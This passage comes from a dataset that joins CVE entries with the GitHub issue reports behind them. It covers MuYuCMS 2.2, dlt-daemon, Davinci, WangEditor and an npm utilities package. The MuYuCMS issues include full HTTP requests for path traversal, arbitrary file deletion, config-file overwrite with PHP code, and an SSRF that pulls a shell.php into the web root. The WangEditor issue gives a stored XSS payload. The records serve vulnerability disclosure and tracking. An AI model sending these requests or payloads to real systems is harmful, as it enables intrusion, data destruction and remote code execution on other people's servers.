"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/4"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221802"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221802"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221802"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221802"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/MuYuCMS/MuYuCMS/issues/4 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"MuYuCMS",
"MuYuCMS"
] | 1、Constructing packets after logging in
```
GET /editor/index.php?a=dir_list&dir_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/../../../../../../../../ HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
```
2、Success in revealing the information in the root directory

| The muyucms bug can list files in a directory | https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/4/comments | 0 | 2023-02-25T05:48:06Z | 2023-02-25T05:48:06Z | https://github.com/MuYuCMS/MuYuCMS/issues/4 | 1,599,567,879 | 4 | 4,767 |
CVE-2023-1044 | 2023-02-26T13:15:10.610 | A vulnerability was found in MuYuCMS 2.2. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /editor/index.php. The manipulation of the argument file_path leads to relative path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221803. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221803"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221803"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221803"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221803"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/MuYuCMS/MuYuCMS/issues/5 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"MuYuCMS",
"MuYuCMS"
] | 1、Constructing packets after logging in and we will read the config file
```
GET /editor/index.php?a=get_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
```
Then we can get the key value of the file

Copy the file checksum and replace it in the packet below
```
GET /editor/index.php?a=save_file&file_path=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/member_temp/user/config.php&file_key=5e9c862ce52986e5437652d707c7c82f&file_content=<?php+phpinfo();+php?> HTTP/1.1
Host: test.test
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://test.test
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://test.test/editor/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676601856; PHPSESSID=94241isj4cqrr0nefhv9rvs1b2;XDEBUG_SESSION=PHPSTORM
Connection: close
```

Visit the corresponding location of the file on the website and find that the code has been successfully executed

and we can also execuate other codes

| MuYucms has Arbitrary code execution vulnerability | https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/5/comments | 0 | 2023-02-25T05:52:11Z | 2023-02-25T05:52:11Z | https://github.com/MuYuCMS/MuYuCMS/issues/5 | 1,599,568,913 | 5 | 4,768 |
CVE-2023-1045 | 2023-02-26T13:15:10.697 | A vulnerability was found in MuYuCMS 2.2. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /admin.php/accessory/filesdel.html. The manipulation of the argument filedelur leads to relative path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221804. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.7,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.4,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 3.8,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 2.5,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221804"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221804"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221804"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221804"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/MuYuCMS/MuYuCMS/issues/6 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"MuYuCMS",
"MuYuCMS"
] | 1、 We put a txt file in the root of our website with the file name test.txt.
2、Constructing packets after logging into the backend
```
POST /admin.php/accessory/filesdel.html HTTP/1.1
Host: test.test
Content-Length: 55
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/admin.php/accessory/filelist.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: muyu_checkaccre=1676530347; PHPSESSID=ae5mpn24ivb25od6st8sdoouf7; muyu_first=1676531718;XDEBUG_SESSION=PHPSTORM
Connection: close
filedelur=/upload/files/.gitignore/../../../../test.txt
```

| MuYucms has Arbitrary file deletion vulnerability | https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/6/comments | 0 | 2023-02-25T05:55:02Z | 2023-02-25T05:55:02Z | https://github.com/MuYuCMS/MuYuCMS/issues/6 | 1,599,569,638 | 6 | 4,769 |
CVE-2023-1046 | 2023-02-26T13:15:10.797 | A vulnerability classified as critical has been found in MuYuCMS 2.2. This affects an unknown part of the file /admin.php/update/getFile.html. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221805 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/7"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221805"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221805"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?ctiid.221805"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://vuldb.com/?id.221805"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:muyucms:muyucms:2.2:*:*:*:*:*:*:*",
"matchCriteriaId": "E558AF9C-EBCD-4299-94C6-E32EC2D9C336",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"918"
] | 918 | https://github.com/MuYuCMS/MuYuCMS/issues/7 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"MuYuCMS",
"MuYuCMS"
] | 1、Constructing packets after logging in and we will read the config file
```
POST /admin.php/update/getFile.html?url=http://127.0.0.1:8000/shell.php&save_dir=F:/Tools/phpstudy_pro/WWW/MuYuCMS-master/MuYuCMS-master/template/ HTTP/1.1
Host: test.test
Content-Length: 0
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
X-Requested-With: XMLHttpRequest
Origin: http://test.test
Referer: http://test.test/admin.php/system/update.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=d3bt6cnt59c2dfq7pshva5ffc1; muyu_checkaccre=1676878715; muyu_first=1676879341;XDEBUG_SESSION=PHPSTORM
Connection: close
```
Specify the remote url to download the file and save the downloaded file to the specified location.

Access the specified file directory and find that the code was successfully executed.

| MuYucms has Arbitrary code execution vulnerability | https://api.github.com/repos/MuYuCMS/MuYuCMS/issues/7/comments | 0 | 2023-02-25T06:03:27Z | 2023-02-25T06:03:27Z | https://github.com/MuYuCMS/MuYuCMS/issues/7 | 1,599,571,868 | 7 | 4,770 |
CVE-2023-26257 | 2023-02-27T05:15:12.757 | An issue was discovered in the Connected Vehicle Systems Alliance (COVESA; formerly GENIVI) dlt-daemon through 2.18.8. Dynamic memory is not released after it is allocated in dlt-control-common.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/COVESA/dlt-daemon/issues/440"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "https://github.com/COVESA/dlt-daemon/pull/441/commits/b6149e203f919c899fefc702a17fbb78bdec3700"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00021.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/COVESA/dlt-daemon/issues/440"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/COVESA/dlt-daemon/pull/441/commits/b6149e203f919c899fefc702a17fbb78bdec3700"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00021.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:covesa:dlt-daemon:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66004448-7EF2-4593-88DC-D85CB481BD06",
"versionEndExcluding": null,
"versionEndIncluding": "2.18.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/COVESA/dlt-daemon/issues/440 | [
"Exploit"
] | github.com | [
"COVESA",
"dlt-daemon"
] | Hi great COVESA team, it's me again...haha..
Every weekend, I spend time studying the source code of DLT-DAEMON, and every time I do, I am struck by how impressive it is as software.
## Summary
While reviewing the source code of DLT-passive-node-ctrl, I noticed many instances of memory deallocation missing the call to the free() function.
To further investigate, I used ASAN to analyze DLT-passive-node-ctrl and discovered the existence of memory leaks.
## Memory Leak

Memory leak occurs even if no input value is entered.

[dlt-control-common.c]
It appears that the heap memory allocated by calloc() is not being freed.

Likewise, dlt-logstorage-ctrl is also the cause.
It seems to be done by calling the dlt_file_free() function.
As before (https://github.com/COVESA/dlt-daemon/pull/434/commits/428b8355adac30a7713065cb8f5d6c50157ecf27)
## END
I came to know your foundation while researching someip,
Studying dlt-daemon, I admire your skills.
It may be a minor vulnerability (bug), but I am reporting it because there is a possibility that a more competent hacker than me will exploit it later.
Thanks.
Ah! And if possible, I'd like to request a CVE.
If you guys let me, I'll make a request to MITRE.
Please let me know if you allow(Request CVE) it in response.
| [dlt-control-common] Memory Leak - It was verified by ASAN (Address Sanitizer). | https://api.github.com/repos/COVESA/dlt-daemon/issues/440/comments | 7 | 2023-02-05T13:34:12Z | 2023-02-09T09:35:44Z | https://github.com/COVESA/dlt-daemon/issues/440 | 1,571,432,359 | 440 | 4,771 |
CVE-2023-24206 | 2023-02-27T13:15:10.367 | Davinci v0.3.0-rc was discovered to contain a SQL injection vulnerability via the copyDisplay function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/edp963/davinci/issues/2320"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/edp963/davinci/issues/2320"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:davinci_project:davinci:0.3.0:rc:*:*:*:*:*:*",
"matchCriteriaId": "DD59B0B9-4295-4442-B22D-93823ED9406F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/edp963/davinci/issues/2320 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"edp963",
"davinci"
] | <img width="1211" alt="image" src="https://user-images.githubusercontent.com/53847566/212521629-031ed6a1-8c1f-4be1-9a9e-850254ef426c.png">
edp.davinci.dao.DisplayMapper#selectMaxNameOrderByName $ is used as a splice character,which caused Sql Injection
selectMaxNameOrderByName function will be used in edp.davinci.service.impl.DisplayServiceImpl#copyDisplay
<img width="1255" alt="image" src="https://user-images.githubusercontent.com/53847566/212521809-d61421ce-9088-4d0b-ab4f-481f4a84e9fc.png">
<img width="1253" alt="image" src="https://user-images.githubusercontent.com/53847566/212521781-51bf3d51-1f4e-40cb-8544-fbb1c5492a78.png">
<img width="1249" alt="image" src="https://user-images.githubusercontent.com/53847566/212521784-da11f356-b7b0-44ea-8b00-0e334cbbfa1a.png">
| Sql Injection vulnerability in copyDisplay function | https://api.github.com/repos/edp963/davinci/issues/2320/comments | 0 | 2023-01-15T03:40:51Z | 2023-01-15T03:40:51Z | https://github.com/edp963/davinci/issues/2320 | 1,533,639,454 | 2,320 | 4,772 |
CVE-2023-24251 | 2023-02-27T16:15:13.030 | WangEditor v5 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /dist/index.js. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cutegod/CMS_0_day/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Cutegod/CMS_0_day/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:wangeditor:wangeditor:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5F700485-A98B-4B79-A634-BC4F83E17B32",
"versionEndExcluding": null,
"versionEndIncluding": "5.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Cutegod/CMS_0_day/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Cutegod",
"CMS_0_day"
] | **Preface**
WangEditor 5 is an html rich text editor component developed based on javascript and css, which is open source and free. The first version of the product was released in November 2014. Rich text editor is one of the projects with the highest front-end complexity. An excellent product requires long-term design, research and development and iteration. The construction period is calculated by years
**Component official website**
https://www.wangeditor.com/
**Product**
WangEditor
**Affected version**
Version <= 5
**POC**
<iframe srcdoc=<svg/onload=alert(1)>></iframe>
**Vulnerability environment construction**
Refer to the official website link
https://www.wangeditor.com/v5/getting-started.html
Refer to bilbilbil video
https://www.bilibili.com/video/BV1xY4y147Hq/?spm_id_from=333.999.0.0
The official documents and videos are more detailed and will not be described here. After installing wangEditor, you can refer to your own building code.
Attach the source code you built for reference, or there is a demo built by yourself on the official website, which can also be accessed directly
https://www.wangeditor.com/demo/index.html


After successful local construction

Or directly use the official website demo
https://www.wangeditor.com/demo/index.html

**code analysis**
According to the official website building tutorial, after installing the wangeditor editor, you need to reference the wangeditor editor. You need to reference the wangeditor's css and js in the head tag and body respectively. (Please refer to the above vulnerability environment building details for details)

You can see 30 lines of online referenced js files, track and reference wangeditor files, and search globally for data-w-e-type="video"
https://unpkg.com/ @wangeditor/ editor@5.1.23 /dist/index.js
In this line, we can see that the video link iframe we entered is not properly filtered, which leads to the subsequent use of the storage XSS vulnerability of iframe

After local debugging, you can see that the relevant xss filtering has not been done well, resulting in the editor's storage XSS vulnerability.

**Vulnerability exploitation**
Local utilization effect

Fill in the POC and click OK to cause a storage-type XSS vulnerability.


If you use the official website demo, the effect is as follows

| WangEditor 5 editor has a storage XSS vulnerability | https://api.github.com/repos/Cutegod/CMS_0_day/issues/2/comments | 0 | 2023-01-17T06:39:23Z | 2023-01-17T06:47:20Z | https://github.com/Cutegod/CMS_0_day/issues/2 | 1,535,854,279 | 2 | 4,773 |
CVE-2023-26105 | 2023-02-28T05:15:13.053 | All versions of the package utilities are vulnerable to Prototype Pollution via the _mix function.
| {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
